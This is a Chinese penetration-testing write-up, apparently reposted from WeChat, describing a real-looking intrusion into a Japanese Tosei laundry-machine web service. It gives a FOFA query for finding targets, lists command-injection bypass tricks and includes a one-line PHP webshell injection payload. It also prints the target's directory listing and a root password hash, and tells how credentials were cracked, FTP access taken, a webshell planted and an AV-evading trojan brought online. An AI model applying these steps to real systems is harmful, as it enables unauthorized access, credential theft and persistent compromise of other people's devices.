注:本文仅做技术假设分享,禁止对外非法渗透,违者后果自负
1.信息收集
前段时间很火的东正洗衣机rce漏洞
语法
fofa: body="tosei_login_check.php"
页面长这样
poc如下
后台常规的测试功能管道符绕过
成功RCE
2.打点
这里复习一下常见的命令注入绕过方式
1.管道符
2.拼接字符串 windows: ~%xxx:0~1 linux: $xxx:start,length
3.特殊符号^,"",(),$@
4.空格绕过, ${IFS},{}
5.变量赋值
6.默认路径 通配符
7.hex编码 xxd
8.base64编码
9.分号绕过
10.``绕过
11. 绕过
12. dnslog绕过
这里处理一下上传webshell的问题
IFS=,;`cat<<<'<?php @eval($_POST[1]);?>'>5.php`
没处理成功,对面系统无法执行
折腾了半天的下载,发现机子不出网,无ping和curl
无权限写目录,tmp对应目录了也无法写
干到这了,不写个shell怪可惜的
开始信息收集!
1.本机信息收集
pwd
查看当前目录
ls${IFS}-lah
total 1.8M
drwxrwxrwx 3 root root 4.0k Jun 13 2018 .
drwxrwxrwx 5 root root 1.0k Nov 20 2018 ..
lrwxrwxrwx 1 root root 12 Dec 29 2004 .htaccess -> ../.htaccess
-rwxr-xr-x 1 root root 6.8k Sep 28 2005 alert_rss.rdf
-rwxr-xr-x 1 root root 1.3k Jan 11 2005 downloader.php
lrwxrwxrwx 1 root root 23 Dec 29 2004 images -> /usr/apache/html/images
-rwxr-xr-x 1 root root 5.7k Oct 24 2005 imode_alldata.php
-rwxr-xr-x 1 root root 7.6k Jan 12 2005 imode_eventlog.php
-rwxr-xr-x 1 root root 3.2k Dec 6 2005 imode_eventstat.php
-rwxr-xr-x 1 root root 2.1k Jan 12 2005 imode_info.php
drwxrwxrwx 2 root root 2.0k Jun 13 2018 include
-rwxrwxrwx 1 root root 4.7k Oct 25 2017 index_x1.php
-rwxrwxrwx 1 root root 4.8k Feb 25 2011 index_x11.php
-rwxrwxrwx 1 root root 6.4k Oct 25 2017 index_x12.php
-rwxrwxrwx 1 root root 11k Feb 25 2011 index_x13.php
-rwxrwxrwx 1 root root 4.3k Feb 25 2011 index_x14.php
-rwxrwxrwx 1 root root 5.4k Feb 25 2011 index_x15.php
-rwxrwxrwx 1 root root 2.0k Dec 24 05:45 login.php
-rwxrwxrwx 1 root root 32k Sep 14 2017 mainte_jikan_kadou.php
-rwxrwxrwx 1 root root 43k Sep 14 2017 mainte_jikan_uriage.php
-rwxr-xr-x 1 root root 2.2k Apr 15 2016 network_test.php
-rwxrwxrwx 1 root root 5.8k Apr 15 2016 p1_conf_update.php
-rwxrwxrwx 1 root root 6.8k Apr 15 2016 p1_ftpserver.php
-rwxrwxrwx 1 root root 9.1k Jun 23 2016 p1_info_device.php
-rwsr-xr-x 1 root root 17k Apr 5 2016 p1_network_dns.cgi
-rwsr-xr-x 1 root root 14k Jun 14 2016 p1_network_inetd.cgi
-rwsrwxrwx 1 root root 20k Apr 5 2016 p1_network_mail.cgi
-rwsr-xr-x 1 root root 24k Apr 15 2016 p1_schedule_setting.cgi
-rwsr-xr-x 1 root root 14k Apr 5 2016 p1_setdate.cgi
-rwsr-xr-x 1 root root 17k Apr 5 2016 p1_setipadr.cgi
-rwxrwxrwx 1 root root 1.1k May 6 2011 p1_system_check.php
-rwsr-xr-x 1 root root 20k Apr 5 2016 p1_system_ntp.cgi
-rwsr-xr-x 1 root root 14k Jun 14 2016 p1_system_user.cgi
-rwxrwxrwx 1 root root 1.2k Apr 26 2011 p1_user_check.php
-rw-r--r-- 1 root contec 17k May 21 2007 style_tosei.css
-rwxrwxrwx 1 root root 2.7k Sep 18 2007 tosei-i_running.php
-rwxrwxrwx 1 root root 2.3k Sep 18 2007 tosei-i_running1.php
-rwxrwxrwx 1 root root 18k Feb 14 2011 tosei-i_sousa.php
-rwxrwxrwx 1 root root 16k Feb 21 2011 tosei-i_sousa_2.php
-rwxrwxrwx 1 root root 8.5k Jan 30 2011 tosei-i_sousa_3.php
-rwxrwxrwx 1 root root 7.4k Jan 30 2011 tosei-i_sousa_check.php
-rwxrwxrwx 1 root root 1.6k Sep 12 2007 tosei-i_sousa_check1.php
-rwxrwxrwx 1 root root 5.1k Jan 30 2011 tosei-i_sousa_check2.php
-rw-r--r-- 1 fws fws 35k Dec 1 2010 tosei_common.def
-rwxrwxrwx 1 root root 2.6k Aug 28 2017 tosei_creditinfo.php
-rwxrwxrwx 1 root root 21k Sep 15 2017 tosei_datasend.php
-rwxrwxrwx 1 root root 1.9k Sep 14 2017 tosei_error.php
-rwxrwxrwx 1 root root 36k Oct 10 2017 tosei_getubetu_kadou.php
-rwxrwxrwx 1 root root 30k Nov 13 2017 tosei_getubetu_uriage.php
-rwxrwxrwx 1 root root 4.0k Apr 15 2016 tosei_gokiinfo.php
-rwxrwxrwx 1 root root 13k Sep 14 2017 tosei_gulisu_settei.php
-rwxrwxrwx 1 root root 8.6k Aug 9 2017 tosei_gulisu_tenken.php
-rwxrwxrwx 1 root root 17k Apr 20 2016 tosei_haraidashi.php
-rwxrwxrwx 1 root root 4.3k Sep 19 2007 tosei_help.php
-rwxrwxrwx 1 root root 43k Oct 10 2017 tosei_hiduke_kadou.php
-rwxrwxrwx 1 root root 27k Nov 13 2017 tosei_hiduke_uriage.php
-rwxrwxrwx 1 root root 7.4k Apr 4 2018 tosei_honjitsu_tenko.php
-rwxrwxrwx 1 root root 8.4k Sep 14 2017 tosei_ipento_setei.php
-rwxrwxrwx 1 root root 34k Oct 10 2017 tosei_jikan_kadou.php
-rwxrwxrwx 1 root root 50k Nov 13 2017 tosei_jikan_uriage.php
-rwxrwxrwx 1 root root 26k Dec 4 2015 tosei_kikai.php
-rwxrwxrwx 1 root root 10k Sep 14 2017 tosei_kikai_era.php
-rwxrwxrwx 1 root root 10k Sep 20 2017 tosei_kikai_jyouhou.php
-rwxrwxrwx 1 root root 8.4k Mar 26 2018 tosei_kikai_kanri.php
-rwxrwxrwx 1 root root 11k Sep 14 2017 tosei_kikai_name.php
-rwxrwxrwx 1 root root 11k Sep 8 2017 tosei_kikai_seisanki.php
-rwxrwxrwx 1 root root 6.3k Apr 6 2016 tosei_kikai_siyou.php
-rwxrwxrwx 1 root root 18k Nov 16 2017 tosei_kikai_sousa.php
-rwxrwxrwx 1 root root 10k Apr 15 2016 tosei_kishuinfo.php
-rwxr-xr-x 1 root root 354 Feb 18 2016 tosei_login_check.php
-rwsrwxrwx 1 root root 13k Apr 5 2016 tosei_mainte_user.cgi
-rwxrwxrwx 1 root root 13k Sep 14 2017 tosei_oiru_settei.php
-rwxrwxrwx 1 root root 8.6k Aug 9 2017 tosei_oiru_tenken.php
-rwxrwxrwx 1 root root 4.7k May 26 2016 tosei_owner_card.php
-rwxrwxrwx 1 root root 11k Apr 3 2018 tosei_owner_helocall.php
-rwxrwxrwx 1 root root 2.6k Aug 28 2017 tosei_payment_info.php
-rwsr-xr-x 1 root root 14k Jun 20 2016 tosei_payment_user.cgi
-rwsrwxrwx 1 root root 12k Apr 5 2016 tosei_reboot.cgi
-rwxrwxrwx 1 root root 16k Sep 14 2017 tosei_rinfareta_settei.php
-rwxrwxrwx 1 root root 15k May 31 2012 tosei_rinfareta_tenken.php
-rwxrwxrwx 1 root root 2.0k Apr 5 2016 tosei_running.php
-rwxrwxrwx 1 root root 8.0k Sep 14 2017 tosei_ryoukin_henkou.php
-rwxrwxrwx 1 root root 84k Sep 14 2017 tosei_save_data.php
-rwxrwxrwx 1 root root 39k Sep 14 2017 tosei_setup.php
-rwxrwxrwx 1 root root 9.1k Apr 4 2018 tosei_shisutemu_helocall.php
-rwxrwxrwx 1 root root 3.1k Apr 15 2016 tosei_shopinfo.php
-rwxrwxrwx 1 root root 44k Sep 14 2017 tosei_sousa.php
-rwxrwxrwx 1 root root 32k Mar 11 2016 tosei_sousa_2.php
-rwxrwxrwx 1 root root 7.9k May 26 2016 tosei_sousa_check.php
-rwxrwxrwx 1 root root 3.9k Sep 14 2017 tosei_sousa_history.php
-rwsrwxrwx 1 root root 13k Apr 5 2016 tosei_sub_user.cgi
-rwxrwxrwx 1 root root 8.9k Sep 14 2017 tosei_syuusei.php
-rwxr-xr-x 1 root root 5.8k Mar 14 2007 tosei_syuusei.php.org
-rwxrwxrwx 1 root root 23k Sep 5 2017 tosei_top.php
-rwxrwxrwx 1 root root 137k Nov 14 2017 tosei_uriage.php
-rwxrwxrwx 1 fws fws 104k Dec 1 2010 tosei_uriage.php.org
-rwxrwxrwx 1 root root 50k Sep 14 2017 tosei_waribiki_1.php
-rwxrwxrwx 1 root root 42k Sep 12 2007 tosei_waribiki_1a.php
-rwxrwxrwx 1 root root 40k Sep 14 2017 tosei_waribiki_2.php
-rwxrwxrwx 1 root root 31k Sep 14 2017 tosei_waribiki_check.php
-rwxrwxrwx 1 root root 45k Oct 10 2017 tosei_youbi_kadou.php
-rwxrwxrwx 1 root root 29k Nov 13 2017 tosei_youbi_uriage.php
都无写入权限
试试tmp目录下
tmp也不能下载文件,只能touch一个文件
web目录也没权限写
难道就要就此放弃了吗
2.破解密码
cat一下/etc/passwd
发现了惊喜
/etc/passwd一般存的是一般的用户信息
/etc/shadow存储用户密码信息
前者格式
用户名:密码:用户 ID:用户组 ID:注释:用户目录:登录 shell
当密码存储在/etc/shadow时,密码用x代替
例如:root:x:0:0:root:/root:/bin/bash
后者格式
用户名:密码:上次修改密码日期(从 1970 年 1 月 1 日起的天数):密码在两次修改期间的最小天数(0 表示可在任何时间修改):密码需要被变更的天数(99999 表示不需要变更):密码变更前提前几天警告:账号失效日期:账号失效后被禁用的天数:保留字段
root:$6$Fsf6Q6SH$MlagWih0lcGFxtAo7/s8Z5.wywJyCqH6qateZ6yPFOPm8bNYTGAEPygZxSOPR1A9Rtw.WxJp2fNMOoeB1wj890:17524:0:99999:7:::
这里密码直接泄露在etc/passwd里,我们可以尝试来破解
成功破解两个账户
但对方22端口拒绝连接
g
3.发现htaccess文件
发现精彩东西
chatgpt一下就行了
这个配置文件直接暴露了权限控制要求的目标用户
且对应的文件在
那还等什么,我们直接
cat /usr/apache/.pass
发现好东西
再次破解成功
其他的也可以拿去破解破解
左边是密码,右边是账号
非常完美
3.登录测试
1.进入管理页面输入账号密码
成功打入
然后翻阅
抓重点文件进行测试
1.之前的命令注入由此产生
2.ftp服务器发现好东西
发现ftp的ip,密码,端口,还有域名信息
账号密码端口
密码的话直接f12明文查看
直接ftp
成功进入
3.put lcd上传下载东西姿势
这是最简单的ftp操作
成功种入一句话木马
4.上免杀木马
成功上线
原文始发于微信公众号(迪哥讲事):渗透实战:记一次JP web服务RCE到内网
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论